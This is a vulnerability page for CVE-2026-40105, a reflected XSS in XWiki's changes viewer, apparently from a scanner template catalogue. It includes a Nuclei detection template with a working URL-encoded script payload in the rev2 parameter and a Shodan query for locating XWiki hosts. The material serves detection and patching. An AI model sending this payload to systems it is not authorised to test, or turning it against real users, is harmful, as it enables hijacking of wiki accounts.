
XWiki - Cross-Site Scripting

CVE-2026-40105
Verified

Description

XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

xwiki-platform

Published Date

May 4, 2026

Template Author

ritikchaddha

CVE-2026-40105.yaml
id: CVE-2026-40105

info:
  name: XWiki - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.
  impact: |
    Attackers can execute JavaScript in users' browsers, potentially compromising admin accounts and the entire XWiki instance.
  remediation: |
    Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40105
    - https://jira.xwiki.org/browse/XWIKI-22481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-40105
    epss-score: 0.00737
    epss-percentile: 0.7305
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.title:"XWiki"
  tags: cve,cve2026,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "<h1>Changes for page"
          - "From version"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204247801b95894a0c7c75f4d8ead0d8c1ff61adc39fd1816e06d75f088875a174022100db73fbe3aded7cc87af87795477160881311adea797b5e680ef7c39bd0251dac:922c64590222798bb761d5b6d8e72950
Score: 6.1

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2026-40105
CWE ID:
CWE-79

References

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c
https://nvd.nist.gov/vuln/detail/CVE-2026-40105
https://jira.xwiki.org/browse/XWIKI-22481

Remediation Steps

Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.